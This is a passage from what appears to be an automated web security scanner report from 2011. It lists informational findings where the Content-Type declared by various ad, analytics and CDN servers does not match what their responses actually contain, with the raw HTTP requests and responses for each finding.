Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2344481&PluID=0&w=300&h=250&ord=2310578&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/w%3B236732442%3B0-0%3B0%3B31555527%3B4307-300/250%3B41285215/41303002/1%3B%3B%7Eaopt%3D2/1/81/0%3B%7Esscs%3D%3f$$&z=800 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/public/shared/scripts/ad-loader-frame.html?req=http://ad.doubleclick.net/adj/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=2;sz=300x250;kw=top;kw=more-chromebooks-from-google-chrome-os-web-store-updates-too;kw=05;kw=2011;kw=news;kw=gadgets;ord=46317853808868680
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iLxqaLMH07l000001jlP8aJjE0dpH00001iVAyaL8w0clo00001jpdKaLsn073a00002iRpfaL7W0c9M00001jz2OaLMO0cEf00001juYhaL6q07Kl00001klD7aM7G077T00001jFU0aLQg0duS00001jFT.aLQg0duS00001kgh7aLQg02WG00001iLaRaL9K0bnA00001jBofaIOs07Si00001jAsGaJH602WG00003jelLaL7W07pd00002iRoBaLsa0c9M00001isyIaL8z02WG00001iLzpaM7607l000001; B3=9qGw0000000002uz9wtb0000000001ur8Whx0000000003uu82s80000000002uy9oDg0000000001ut97QM0000000001uA97QP0000000001uB9vHV0000000001uA90N.0000000001uB9X5k0000000001uA910k0000000001uz98nW0000000001uy910n0000000001uy9c210000000002uy96EU0000000001uy8SAT0000000001uy9yEe0000000001uA9yEg0000000001uA7dOu0000000001uy

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iVAyaL8w0clo00001jlP8aJjE0dpH00001iLxqaLMH07l000001jz2OaLMO0cEf00001iRpfaL7W0c9M00001jpdKaLsn073a00002juYhaL6q07Kl00001jFU0aLQg0duS00001klD7aM7G077T00001jFT.aLQg0duS00001kgh7aLQg02WG00001jpA4aM9n0bdR00001jelLaL7W07pd00002jAsGaJH602WG00003jBofaIOs07Si00001iLaRaL9K0bnA00001iRoBaLsa0c9M00001isyIaL8z02WG00001iLzpaM7607l000001; expires=Wed, 10-Aug-2011 09:28:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=82s80000000002uy8Whx0000000003uu9wtb0000000001ur9qGw0000000002uz9oDg0000000001ut97QM0000000001uA97QP0000000001uB8Yox0000000001uB9vHV0000000001uA910k0000000001uz9X5k0000000001uA90N.0000000001uB910n0000000001uy98nW0000000001uy9c210000000002uy9yEe0000000001uA8SAT0000000001uy96EU0000000001uy7dOu0000000001uy9yEg0000000001uA; expires=Wed, 10-Aug-2011 09:28:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 13:27:59 GMT
Connection: close
Content-Length: 2847

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
22.11. http://cdn.gigya.com/js/gigya.services.socialize.plugins.login.min.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.gigya.com
Path:   /js/gigya.services.socialize.plugins.login.min.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/gigya.services.socialize.plugins.login.min.js HTTP/1.1
Host: cdn.gigya.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sun, 08 May 2011 08:38:57 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
x-server: web103
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Thu, 12 May 2011 13:28:30 GMT
Connection: close
Content-Length: 58954

(function(){if(typeof gigya.services.socialize.plugins=="undefined"){gigya.services.socialize.plugins={};}var _pi=gigya.services.socialize.plugins;if(typeof _pi.common=="undefined"){_pi.common={addCSS
...[SNIP]...
22.12. http://cdn2-b.examiner.com/sites/all/themes/mvt/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn2-b.examiner.com
Path:   /sites/all/themes/mvt/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/all/themes/mvt/favicon.ico HTTP/1.1
Host: cdn2-b.examiner.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXAMINEREDITION=921; s_cc=true; s_visit=1; s_lv=1305207037528; s_lv_s=First%20Visit; s_dlv=First%20Visit; s_sq=%5B%5BB%5D%5D; __utmx=109783377.00014856530318718587:1:1; __utmxx=109783377.00014856530318718587:3831945:2592000; s_vi=[CS]v1|26E5F07F051D377E-40000107E0007494[CE]; __qca=P0-1856564548-1305207049190; __utmz=47567992.1305207098.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=47567992.122801018.1305207098.1305207098.1305207098.1; __utmc=47567992; __utmb=47567992.1.10.1305207098

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Content-Type: text/plain; charset=UTF-8
Date: Thu, 12 May 2011 13:34:13 GMT
ETag: "11483a3-47e-4a20054d83d80+gzip"
Expires: Thu, 26 May 2011 13:34:13 GMT
Last-Modified: Thu, 28 Apr 2011 20:23:34 GMT
Server: ECS (dca/5330)
Vary: Accept-Encoding
X-Cache: HIT
X-WebNode: web5.b.examiner.com
Content-Length: 1150

............ .h.......(....... ..... .....@....................................f3`.f3..f3..f3..f3..f3..f3..f3`.........................f3 .f3..f3..f3..f3..f3..f3..f3..f3..f3..f3..f3 .............f3 .f
...[SNIP]...
22.13. http://cdn2-b.examiner.com/sites/all/themes/x2/fonts/Museo500-Regular-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn2-b.examiner.com
Path:   /sites/all/themes/x2/fonts/Museo500-Regular-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/all/themes/x2/fonts/Museo500-Regular-webfont.woff?version=72 HTTP/1.1
Host: cdn2-b.examiner.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXAMINEREDITION=921; __utmz=109783377.1305207036.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109783377.2080855934.1305207036.1305207036.1305207036.1; __utmc=109783377; __utmb=109783377.1.10.1305207036; s_cc=true; s_visit=1; s_lv=1305207037528; s_lv_s=First%20Visit; s_dlv=First%20Visit; s_sq=%5B%5BB%5D%5D; __utmx=109783377.00014856530318718587:1:1; __utmxx=109783377.00014856530318718587:3831945:2592000

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Content-Type: text/plain; charset=UTF-8
Date: Thu, 12 May 2011 13:32:06 GMT
ETag: "9d0755-7e84-4a200585c8240+gzip"
Expires: Thu, 26 May 2011 13:32:06 GMT
Last-Modified: Thu, 28 Apr 2011 20:24:33 GMT
Server: ECS (dca/533E)
Vary: Accept-Encoding
X-Cache: HIT
X-WebNode: web6.b.examiner.com
Content-Length: 32388

wOFF......~.................................FFTM............[...GDEF.......-...2....GPOS..........!.6/..GSUB...... ... l.t.OS/2......S...`...Gcmap................cvt .......j...j...&fpgm...........e
...[SNIP]...
22.14. http://cm.npc-gatehouse.overture.com/partner/css/ads.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cm.npc-gatehouse.overture.com
Path:   /partner/css/ads.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /partner/css/ads.css HTTP/1.1
Host: cm.npc-gatehouse.overture.com
Proxy-Connection: keep-alive
Referer: http://cm.npc-gatehouse.overture.com/js_1_0/?config=5970914500&type=news&keywordCharEnc=utf8&mkt=us&source=npc_gatehouse_mysuburbanlife_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th&outputCharEnc=utf8&tg=1&bc=dbdbdb&cc=ffffff&lc=000000&tc=666666&uc=666666&du=1&cb=1305207048874&ctxtContent=%3Chead%3E%0A%09%09%0A%09%09%09%3Cbase%20href%3D%22http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%22%3E%0A%09%09%0A%09%09%0A%09%09%09%3Ctitle%3ETo%20do%20tonight%3A%20Watch%20'American%20Idol'%3B%20%22Priest%22%20opens%20Friday%20the%2013th%20%20-%20Lyons%2C%20IL%20-%20Lyons%20Suburban%20Life%3C%2Ftitle%3E%0A%09%09%0A%09%09%0A%09%09%3Cmeta%20content%3D%22Lyons%20Suburban%20Life%20-%20%0A%09Your%20daily%20entertainment%20update%20with%20items%20on%20%26amp%3Bquot%3BAmerican%20Idol%26amp%3Bquot%3B%20tonight%20on%20Fox%2C%20%26amp%3Bquot%3BPriest%26amp%3Bquot%3B%20opening%20on%20Friday%20the%2013th%20and%20a%20recipe%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=76of9et6r747t&b=3&s=m1; UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDVzczEwNzY1cAE0JU9Qw=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:24 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private, max-age=86400
Last-Modified: Mon, 07 Mar 2011 07:32:51 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: text/css
Content-Length: 923

<style type=text/css>

.clsResult
{
background: #dddec8;
margin: 0px 0px;
padding: 1px 1px;
}
.clsResultTitle
{
font-family: Verdana, Ari
...[SNIP]...
22.15. http://crenk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://crenk.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925; bp-activity-oldestpage=1; bsau=13052069471010961856; bsas=13052069471019356657; PHPSESSID=uhmmla1416obel17op5q4k8u00

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Last-Modified: Fri, 04 Mar 2011 07:47:07 GMT
Content-Length: 3638
Date: Thu, 12 May 2011 13:31:38 GMT
X-Varnish: 2341019626 2340990215
Age: 148
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

..............h...&... ..............(....... ...........@...........................SP......%!......~z..0.......BJ......aU......o{......!!......rf......c]......*1..........QK......km..UY............
...[SNIP]...
22.16. http://crenk.com/wp-admin/admin-ajax.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://crenk.com
Path:   /wp-admin/admin-ajax.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
Origin: http://crenk.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925
Content-Length: 34

action=track_article_view&id=16812

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 13:29:35 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
X-Content-Type-Options: nosniff
Connection: Keep-Alive
Content-Length: 2

-1
22.17. http://feeds.delicious.com/v2/json/urlinfo/data  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://feeds.delicious.com
Path:   /v2/json/urlinfo/data

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /v2/json/urlinfo/data?url=http://crenk.com/buy-chromebook/&callback=displayURL HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1vlfom16rm5tu&b=3&s=ss; delicious_us_production=OydNPda_O1zXxdnIVcyje3pEKb95LSjrjc82CPlKKGT_dOza.tuZwY_pgiAaUlvu0.y.OzT._QRh3KWs1_dOi5HL1ZA6UOGUAN2bDZVdvaBQ2EMo68hv5F8aEKHwRqeI1xBqWBgE5nkJzGyK0ZJgH2n0z_kiV8u6zKgbULmqvNynY93BinIodzYJ16M16j7UkF5fQqBEeA7e1vkqMhWGtRkVXH6eNJCrx4ula3hPn2uCi1TuHx2qJIiFgZrmsYxWumqd73QzLcEMQzllCZYfs0TzDNnM849BWR8dLyBntJE_FoZy.noxQR3Ut3PJt9zNy3r1olg.18E-

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.4
Content-Length: 14

displayURL([])
22.18. http://hits.nextstat.com/cgi-bin/wsv2.cgi  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hits.nextstat.com
Path:   /cgi-bin/wsv2.cgi

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /cgi-bin/wsv2.cgi?108645 HTTP/1.1
Host: hits.nextstat.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: private
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: webStat_108645=12beedaea78edd58b2a6f91af1fe6b38; expires=Sun, 09-May-2021 13:32:25 GMT; path=/; domain=.nextstat.com
Set-Cookie: webStat_108645_mv=12beedaea78edd58b2a6f91af1fe6b38; expires=Sun, 09-May-2021 13:32:25 GMT; path=/; domain=.nextstat.com
Content-Length: 4096
Connection: close
Content-Type: text/html; charset=UTF-8

function wf_get_rfsqv() {
var q = (WS_rfs_3p && WS_ref.indexOf('?') > 0)?WS_ref.substring(WS_ref.indexOf('?')+1):WS_rfs.location.search.substring(1),v = q.split("&");
for (var i=0;i<v.length;i++)
...[SNIP]...
22.19. http://image3.pubmatic.com/AdServer/UPug  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /AdServer/UPug?operId=2&pubId=398&pixId=6&ran=0.4319008697356448&pageURL=http://www.pubmatic.com/aboutus/overview HTTP/1.1
Host: image3.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/aboutus/overview
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; PUBRETARGET=82_1399045295.806_1336140548; KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; __utmb=103266945.2.10.1305207252; __utmc=103266945; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:24 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 488

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/398/6/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true"
...[SNIP]...
22.20. http://media.courierpress.com/corp_assets/asphalt/_sites/ecp/img/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://media.courierpress.com
Path:   /corp_assets/asphalt/_sites/ecp/img/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /corp_assets/asphalt/_sites/ecp/img/favicon.ico HTTP/1.1
Host: media.courierpress.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 22:33:13 GMT
ETag: "42a775-8be-49b401e281c40"
Accept-Ranges: bytes
Content-Length: 2238
Content-Type: text/plain; charset=UTF-8
Date: Thu, 12 May 2011 13:34:02 GMT
Connection: close

...... ..............(... ...@........................................u>..O.......O...M...O...M...K...K...........d&..tA......M...O...qC..n<..........F...D...i0..c-..t?..;...L.......L...]$..........F
...[SNIP]...
22.21. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/makeRequest  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/makeRequest

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /gadgets/makeRequest?refresh=3600&url=http%3A%2F%2Ffcgadgets.appspot.com%2Fs%2Ff%3Fn%3D0.690410268958658%26pageurl%3Dhttp%3A%2F%2Forangeorb.blogspot.com%2F2011%2F05%2Fplanets-align-on-friday-13th-and.html&httpMethod=GET&headers=&postData=&authz=&st=&contentType=DOM&numEntries=3&getSummaries=false&signOwner=true&signViewer=true&gadget=http%3A%2F%2Ffcgadgets.appspot.com%2Fspec%2Fshareit.xml&container=peoplesense&bypassSpecCache=&getFullHeaders=false HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Referer: http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml&container=peoplesense&parent=http://orangeorb.blogspot.com/&mid=0&view=profile&libs=google.blog&d=0.558.7&lang=en&country=US&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22Share+it%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23ffffff%22,%22ENDCAP_LINK_COLOR%22:%22%23ffc619%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%23ffc619%22,%22CONTENT_TEXT_COLOR%22:%22%23ffffff%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%23ffc619%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23000000%22,%22CONTENT_HEADLINE_COLOR%22:%22%23050c10%22,%22FONT_FACE%22:%22normal+normal+20px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif;%22%7D%7D&communityId=09528749658452737714&caller=http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209791819.1303087791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=209791819.444546987.1303087791.1304097769.1305207073.3; __utmc=209791819; __utmb=209791819.1.10.1305207073

Response

HTTP/1.1 200 OK
Expires: Thu, 12 May 2011 14:33:15 GMT
Cache-Control: public,max-age=3600
Content-Disposition: attachment;filename=p.txt
Content-Type: application/json; charset=UTF-8
Date: Thu, 12 May 2011 13:33:15 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 383

throw 1; < don't be evil' >{"http://fcgadgets.appspot.com/s/f?n=0.690410268958658&pageurl=http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html":{"body":"\u003c?xml version=\"1.0
...[SNIP]...
22.22. http://ping.crowdscience.com/ping.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ping.js?url=http%3A%2F%2Fwww.zdnet.com%2Fblog%2Fcomputers%2Fcan-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook%2F5773&id=c2e7cdddce&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F534.24%20(khtml%2C%20like%20gecko)%20chrome%2F11.0.696.65%20safari%2F534.24&x=1305206911608&c=0&t=0&v=0&m=0&cp0=[]&cp1=[J-kzEAoPOk4AAFIsDHEAAABP] HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csv=6522d442e56f04a6

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=6522d442e56f04a6; Domain=.crowdscience.com; expires=Wed, 10 Aug 2011 13:28:57; Path=/
Content-Length: 869
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

document.cookie = '__cst=6585ea3a78e49172;path=/';
document.cookie = '__csv=6522d442e56f04a6|0;path=/;expires=' + new Date(new Date().getTime() + 7776000000).toGMTString();
if ('9d96e31a830b9c62'!='1'
...[SNIP]...
22.23. http://rtb50.doubleverify.com/rtb.ashx/verifyc  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rtb50.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5362797&plc=61693702&sid=953446&num=5&ver=2&dv_url=http%3A//cdn-bpx.a9.com/amzn/iframe.html%3Fp%3D281%3Blast%3D1094%3Br%3Da834682&callback=__verify_callback_828489752952 HTTP/1.1
Host: rtb50.doubleverify.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/84483/219801/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Thu, 12 May 2011 13:33:51 GMT
Connection: close
